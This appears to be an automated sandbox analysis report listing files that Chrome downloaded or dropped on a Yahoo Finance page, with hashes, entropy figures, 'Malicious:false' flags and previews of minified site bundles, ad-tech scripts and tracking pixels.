                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["./ErrorMsg.Cn69Klh6.js","./scheduler.Dsuh-FKt.js","./index.CvwOawEI.js","./error_outline.CkdKfkE_.js","./Icon.C8w5V9EK.js","./spread.CgU5AtxT.js","../assets/Icon.DgFg0-NP.css","./commonUtil.BWwawKjd.js","./stores.BCwnb1-k.js","./43.BgWy8GOF.js","./control.CYgJF_JY.js","../assets/ErrorMsg.CmzKsgiD.css","./ChatSupport.IUi6_euu.js","./globals.D0QH3NT1.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{_ as K}from"./preload-helper.D6kgxu3v.js";import{d as L,c as N,aR as X,h as J,aS as ie,aT as Q,aU as G,s as _,aV as oe,Z as le,an as ue,F as W,aW as ce,aX as me,a7 as de}from"./commonUtil.BWwawKjd.js";import{f as M,l as O,b as ae}from"./logUtil.CCV3qKPL.js";import{l as fe,b as pe,c as ge,a as Z}from"./headerUtil.DzYOGaFq.js";import{w as he,x as be,r as x}from"./plusUtil.Bpir1PME.js";import{l as we}from"./loadPortfolios.CP0EWCgJ.js";import{d as Se}from"./index.rV6zwFgL.js";import{a as Pe}from"./ads.DhuB_mth.js";async function ye(e,{silent:t=!1}){const[r,[i]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64662)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):103415
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.333954900515722
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:5wQndm/xVe8DyLfcqYN8SFSJ7DAggrOTUEH:5HdGhGLKFGp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E1FCDBADCA0544111B9BFE5BA59C3086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A98B55B20E8FE4B8C27A74A2C37BFDC5C5EC93E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:974489C9DE5D32D3F539F2D6B70E9B2E1F6AE40B618254C533C8BB087A9B1707
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F09382845B5C5C325DC57D3D13A302BB54F4C53C5DD34F819476C1D505DC21FBCD98E39C270A2F33E7E54CDAE670C241213363BE1A1CBEAC8D01445A82EC5B46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.assertive = {. entityId: "wnsrvBJmEPrTfrnFX",. analytics: {. sampleRate: 0.05,. integrations: {. ivt: false,. },. logUnfilled: true,. useHistoryChangeTrigger: true,. override: {. normalizeSlotId: function (slotId) {. return slotId.replace(. /-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/,. "". );. },. },. },. floor: {. enabled: true,. addToHashKey: false,. currency: "USD",. optimizeThreshold: 'm_0.2',. optimizePrebidThreshold: '1st_1.4',. exploreRate: 0.05,. limit: {. percentage: 0.95,. },. prebid: true,. aps: false,. priceBuckets: [. { min: 0, max: 2, increment: 0.01 },. { min: 2, max: 3, increment: 0.05 },. ],. },.};../**. * Assertive Yield. * v2.33.4. *. * . 2018-2024 Assertive Yield B.V. All Rights Reserved.. */.!function(){function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7907), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.134832253452516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3NiauurulAaIgvP+85ntzZSNLcVNHrjOO:3yuqlPI8Z3NsYVhrjr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:85070595D47A7CC86AF31833110DC18A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:13564B6787EE765D841B2B6D1C4A6E73A2553AF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:79D954B80C39513A18EE1E0143D931BA9222B4C4794438F7BAD23F9E0380CDC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B89211958F1EC914F3C31363EC7A60EFF460A86EAEF594522FD11A75712E0D0B05918C1D3FC720DD5D970399CD59C45E2F0069C5A9AE8014253661A2CEDABD38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-template",[],t):"object"==typeof exports?exports["wafer-template"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-template"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "safe-frame-handler-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 13825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.958377991988274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:NtQdHyULOzjp+PHkrx065mb8K12Emk7vf1g4NHTTB1pIrtHg9rjvjESr:fyHC4G7mbp/mkTfy4NHTF/WtHgpjEm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4CFFCDAC49D9631B80550840E2F46337
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B1ABD3B622BBD202F85CF5AFA532C7033597DB17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9F62C2E032C8544618913840B8B646E0E60BE96A36E6731CB68C9B1818006FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7E5ABD4658583E16F744B4E7E68CAC1C2586D8889A5AB8A0F0F219D249DA7B06A1E4916134AD4463A81F5BF1AADFF3A5FEB35226DC1BDDC6FEB191E43B364EEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..safe-frame-handler-bundle.js..[.s...+X..4'..v.'b.*q.9.g...l.p.,....p$...... ....M"......{f.i.*I..^j4...k..&..x1.F..d..`...i.X.<;b....5.&#..}..G.'.....&..F....,..t..&.r3..q%u"...w.......4C.Vb..kz<J..0..K...$......!....C.Z5.A.../..F.'.d..4..8......p..0.,.e..0..0.%.;d..g..I....A....?...!;a.}0f|...X.y!..Q'$...y...c...6>d.?x.~....Sh..u:......'..@t\...d..Tt]. ...a...D.%....gj0P............Q?=%4^...B.A..v^.{vFh.....:..Y.....*...0.i.G.*... d~g.j..O.p.......+......k.Hkr...:...x........4.Qe`.....>.....o)..{~+%`s.kG.Y....4....>.%..8.5._...3....zq..@...RP......Xw7.a.....l.C.X...#...}..n..V.o.Z.T.F..#.1..8.+._RkW+.R.YTJ.*...Tw..{J.=...@..t....YS....h.=7.#..la.%J....\..W..".^d...Y.uWl...P....r.~..<O=.].6u_.....3...c..D..?.U..}....L|..9..y.>.q. .....!SE]:.N9....ab/....../.g@2y.C.o...QaEMf.x...j......"....Y../....[.i..._R...n.~AY..7...,.,.M..2M....A.0..].sT...i.`.r...Y.b.s...(D.2~..H7.x.jU....Y...........v......7...w.`.....49Hp..|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://eus.rubiconproject.com/usync.html?p=medianet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65354)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):98590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.262081609860911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:l6uJO46KoxxmzxgwyPtXjgypu5DUWCsHEGh363pz1ndumnf:KrxhPSyp0R63pR7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93C71F7FAF9DCA7767823C99109C81D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:01E7B25914D48BB4DD3CD2E6F60CFCD99CAA10EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:66776998B10E583A72F8FD29391A50E2C80EB3BC9A65B0DAFE97E576D7D88507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3E02E2F714D1FB066FFD376FACFD936E75D01D6862D4F7FC353B1D0E725FE3294BBAAE85268DB46541AC7B55D44AC8721A685113FA0D8FD617B323D6DE768B7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static.criteo.net/js/ld/publishertag.prebid.144.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:// Hash: ioxxdjHDzFBt50jsKHcULoEjfPjn7FupHUObUXTEulH1iImcaT1OYYq4nXedv+v6ystL/mciw43eN2N1sBqukEcB1G3yLaozwAQoZarIvpe+op2I8dDWCrnmQL5aA3TRFA2hIGMEsGDPdljIfZlxPKB5Tt8rZMkwd8T+7UEJODk=.!function(e){"use strict";var n=function(e,t){return(n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var i in t)t.hasOwnProperty(i)&&(e[i]=t[i])})(e,t)};function t(e,t){function i(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(i.prototype=t.prototype,new i)}var L=function(){return(L=Object.assign||function(e){for(var t,i=1,n=arguments.length;i<n;i++)for(var r in t=arguments[i])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function i(e,t){var i={};for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&t.indexOf(n)<0&&(i[n]=e[n]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols){var r=0;for(n=Object.getOwnPropertySymbols(e);r<n.length;r++)t.indexOf(n[r])<0&&Object.prototype.pro
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (28463)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28466
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.525606246446017
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:pXdh5IlS+REMvcE6zS90W6HlnQZWDaVyFBqqTz:+6a0vhqdqP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2CDA5DC65B2A4893D5EC07AA83D6A709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A19BC9BAD9360C543583EF1E46DD7817E91D5D5F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A85F31774DF73053E0519FC52A5D1B55145BD7864A72513684A27BC4270195BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:91DB38CFA20B75FE260E89DE309C4DD269E130E7D0A9CE0D515E7E16632E24C638AD02918096ACB5199D09252A1F952BD8DF21A2B4514D02D509141976D5D921
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/DataTable.BDsezPzK.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as w,e as k,b as me,t as R,d as T,f as I,i as g,j as Ee,h as S,q as y,L as Le,k as m,l as D,n as E,m as J,p as V,H as pe,z as Ae,A as ce,W as Ne,B as ge,K as ye}from"./scheduler.Dsuh-FKt.js";import{S as G,i as H,c as x,b as $,m as ee,t as b,a as P,d as te,g as Re,e as Se}from"./index.CvwOawEI.js";import{N as Oe,t as ue,m as be,o as De,q as ve,g as we,v as Ge,b7 as ke}from"./commonUtil.BWwawKjd.js";import{j as He,i as Ve}from"./quoteUtil.C6mXO8A-.js";/* empty css */import{S as Be}from"./StatusTag.Cy1VuVbC.js";import{R as Te,a as Ue,S as Fe}from"./StarRating.c2tDcFcM.js";import{C as Pe}from"./Change.DtNqnL99.js";import{C as Ye,T as Ie}from"./Ticker.CDUz2TSK.js";import{P as ze,T as We,a as de,E as Ke,b as qe,S as je,c as Ze}from"./Table.BmsyL-vx.js";import{g as he,a as Xe}from"./spread.CgU5AtxT.js";import{P as se}from"./PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js";import{B as Qe}from"./Button.C2rixdaC.js"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1399)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.306127713287615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:WQlTXgGRt+OECsFcWGFt2xgmTAUccKVLLTjA4Jr22ddOBAzAjMP+1F:WQOUtHtsrGDtmTHcXLTs4J338jMW7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:578A2D4F035918E93F4F2A3F13442FF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5322166ADAF9F2D12AF71CEB7408BEB414605E15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B6BD8A2C161FD2CBA2C62E0C1282DE2FC5FCD9A7EA505372F34176FB9755C361
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C14C488A47C23B4E9406B9B3DB8911A146388E727C5D88A7BF044931148759C764DD95190532ABFBFCD9418BF804E05D53E8D57E5D37497349E1C37D69793291
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Icon.C8w5V9EK.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as z,p as _,k as v,n as u,i as m,_ as d,A as o,W as b,e as N,H as k,d as H,f as I,z as p,B as g,L as h}from"./scheduler.Dsuh-FKt.js";import{g as S}from"./spread.CgU5AtxT.js";import{S as q,i as A}from"./index.CvwOawEI.js";function y(a){let e,s,i,l=[{class:i=`icon fin-icon ${a[3]}-icn sz-${a[2]} ${a[0]}`},a[4]],c={};for(let t=0;t<l.length;t+=1)c=o(c,l[t]);return{c(){e=N("div"),s=new k(!1),this.h()},l(t){e=H(t,"DIV",{class:!0});var n=I(e);s=p(n,!1),n.forEach(m),this.h()},h(){s.a=null,g(e,c),h(e,"yf-7v4gbg",!0)},m(t,n){v(t,e,n),s.m(a[1],e)},p(t,n){n&2&&s.p(t[1]),g(e,c=S(l,[n&13&&i!==(i=`icon fin-icon ${t[3]}-icn sz-${t[2]} ${t[0]}`)&&{class:i},n&16&&t[4]])),h(e,"yf-7v4gbg",!0)},d(t){t&&m(e)}}}function B(a){let e,s=typeof a[1]=="string"&&y(a);return{c(){s&&s.c(),e=_()},l(i){s&&s.l(i),e=_()},m(i,l){s&&s.m(i,l),v(i,e,l)},p(i,[l]){typeof i[1]=="string"?s?s.p(i,l):(s=y(i),s.c(),s.m(e.parentNode,e)):s&&(s.d(1),s=null)},i:u,o:u,d(i){i&&m(e),s&&s.d(i)}}}function C(a,e,s){const i=["classNa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8662)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8663
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.396867395358276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:5de7oEV9u4No3nPKW1Q2tdFMhaRCAfkBuMVGydm3gyAPDb4s14R:5bPKW1Lt8htcCRGam3TAP/d4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F1EDCF2D88FFF89355D1298DFE6C9E0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4C7F52B6087745C75266FAE8F5ED4A6D66CF23E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:43B6773014804C713EE8B3054C90E19E1474AAABD215974D2CB0EFC50F6CEF84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:294AE4DDA8D20F1C4C6D9887CDE8F9CFD01D9361B30A486447EDD43CC41D89C9B25064D9AC4021F0046483EA7B302B08DA3F07ACCEC56352ED699781EBF0C039
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as te,p as C,k as y,i as _,c as re,A as oe,e as P,b as D,d as v,f as j,j as I,q as b,L as u,M as p,l as N,u as ue,g as me,a as de,N as S,t as M,h as q,O,n as _e,C as x,m as V}from"./scheduler.Dsuh-FKt.js";import{S as ge,i as ce,t as R,g as he,a as w,e as be}from"./index.CvwOawEI.js";import{g as ke}from"./spread.CgU5AtxT.js";import{g as ye,n as Ne,o as Pe,q as ve}from"./commonUtil.BWwawKjd.js";import{g as Ae}from"./i13nUtil.8E8_gCdn.js";/* empty css */function Se(t){const e=t.slice(),a=e[2]||!e[8]||!e[17];return e[30]=a,e}function $(t){let e=t[12],a,i,l=t[12]&&G(t);return{c(){l&&l.c(),a=C()},l(s){l&&l.l(s),a=C()},m(s,f){l&&l.m(s,f),y(s,a,f),i=!0},p(s,f){s[12]?e?te(e,s[12])?(l.d(1),l=G(s),e=s[12],l.c(),l.m(a.parentNode,a)):l.p(s,f):(l=G(s),e=s[12],l.c(),l.m(a.parentNode,a)):e&&(l.d(1),l=null,e=s[12])},i(s){i||(R(l,s),i=!0)},o(s){w(l,s),i=!1},d(s){s&&_(a),l&&l.d(s)}}}function ee(t){let e;function a(s,f){return s[7]?je:Ce}let i=a(t),l=i(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=openx&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=b004b482-f986-09fe-359b-b9b5938edfca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8260), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238261028208202
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:L2JhEpTVHpBTRgbW8DdlWzMEqt16lOTlKW5BCNaCV5WgeTYy3:L2JhEjpBKC8DjWpc16oBKAAaqeky
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DFA69F455EFA8A49A71AF52519927C3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:07E3A5A50D74E9150408B2D5A50AE1242F6A5A33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6014DBEF5594ADD5F4104CE8597BC8C6B755E9DCA6B32E40EB04246E55588406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:72673CB76FB5C77B570C44AD5A156DD634C9E57E8C1FF0845C9C021FA492061804FE07C7C8CBEEA8049C3644C4352C17A575903428C1ACC00255E38C27F4D010
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:webpackJsonpwafer_wafers_wafer_autocomplete([0],{"./src/types recursive ^\\.\\/.*$":function(e,t,r){function a(e){return r(s(e))}function s(e){var t=i[e];if(!(t+1))throw new Error("Cannot find module '"+e+"'.");return t}var i={"./aol-location":"./src/types/aol-location.js","./aol-location.js":"./src/types/aol-location.js","./aol-markets":"./src/types/aol-markets.js","./aol-markets.js":"./src/types/aol-markets.js","./aol-recipes":"./src/types/aol-recipes.js","./aol-recipes.js":"./src/types/aol-recipes.js","./gossip":"./src/types/gossip.js","./gossip.js":"./src/types/gossip.js","./sports-teams":"./src/types/sports-teams.js","./sports-teams.js":"./src/types/sports-teams.js","./weather":"./src/types/weather.js","./weather.js":"./src/types/weather.js"};a.keys=function(){return Object.keys(i)},a.resolve=s,e.exports=a,a.id="./src/types recursive ^\\.\\/.*$"},"./src/types/aol-location.js":function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),r.d(t,"getListMarkup",functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=TTFQQTBWVlEtSS1FV0gx&google_push=&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.969812211935133
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:BGnmgc785X5qWMBjER/ppkr5AHZSoMeFaSUMatIpdAy9NGwztXG8i7:B4/c85X5qWMpiAADVIT0Ay9IwB+7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F4C54FA27FEA7AE023CE409E070A85A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:99172226290B7F1E3F40A8CB1646AE11E656E4BB
